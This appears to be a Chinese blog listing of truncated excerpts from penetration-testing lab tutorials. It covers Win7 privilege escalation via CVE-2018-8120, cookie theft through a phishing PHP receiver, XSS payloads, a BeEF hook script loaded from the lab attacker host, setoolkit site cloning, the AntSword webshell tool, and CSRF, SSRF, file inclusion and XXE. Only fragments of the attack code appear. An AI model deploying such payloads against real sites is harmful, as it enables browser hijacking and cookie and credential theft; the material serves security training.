第1章 实战：Win7系统提权 1.1 实验环境 序号 主机IP 主机系统 主机角色 1 192.168.10.180 Kali 攻击机 2 192.168.10.157 Win7 32位 被攻击机 1.2 使用CVE-2018-8120漏洞进行提权 1.2.1 下载提...

1.1 窃取用户cookie信息保存到远程服务器 1.1.1 构建钓鱼网站接收cookie 页面中创建cookie变量，然后将cookie变量写入cookie.txt [cce lang='bash']# vim /var/www/html/diaoyu.php <?php $c...

1.1 反射型XSS攻击劫持用户浏览器 1.1.1 构造攻击payload [cce lang='bash']<script> window.onload = function() { var link= document.getElementsByTagName('a'); for(j = 0; j < l...

1.1 使用beef劫持用户浏览器 1.1.1 新建hook并启动apache [cce lang='bash']# vim /var/www/html/beef-xss.html <html> <head> <script src='http://192.168.10.180:3000/hook.j...

1.1 持久性XSS窃取用户信息 1.1.1 制作钓鱼网站 使用setoolkit克隆站点，setoolkit是一个万能的社工工具(社会工程学工具集合) [cce lang='bash']# setoolkit Do you agree to the terms of serv...

1.1 中国蚁剑 1.1.1 蚁剑介绍 蚁剑(AntSword)是一款开源的跨平台WebShell管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 1.1.2 下载蚁剑 蚁剑源码：https://...

1.1 CSRF原理 1.1.1 csrf简单理解 假设用户已经保存某网站的登录信息，下次登录不需要认证，此时黑客构造一个访问该站点的链接并添加如：修改密码、转账等操作的参数，用户点击链接后黑客构造的...

1.1 SSRF介绍 1.1.1 SSRF简介 SSRF(Server-Side Request Forgery，服务器端请求伪造)通过篡改HTTP请求中的资源地址发送给服务器，服务器没有校验请求的合法性就解析用户传递过来的请求，处理之...

第1章 文件包含漏洞利用 1.1 文件包含漏洞介绍 文件包含即通过php函数加载另一个文件中的php代码，此函数通常会获取所有文件内容进行执行，识别到php代码后会执行php代码。 1.2 实验环境 序号 ...

1.1 XXE漏洞介绍 XXE（XML External Entity Injection）XML外部实体注入。 XML是一种类似于HTML（超文本标记语言）的可扩展标记语言，是用于标记电子文件使其具有结构性的标记语言，可以用来标...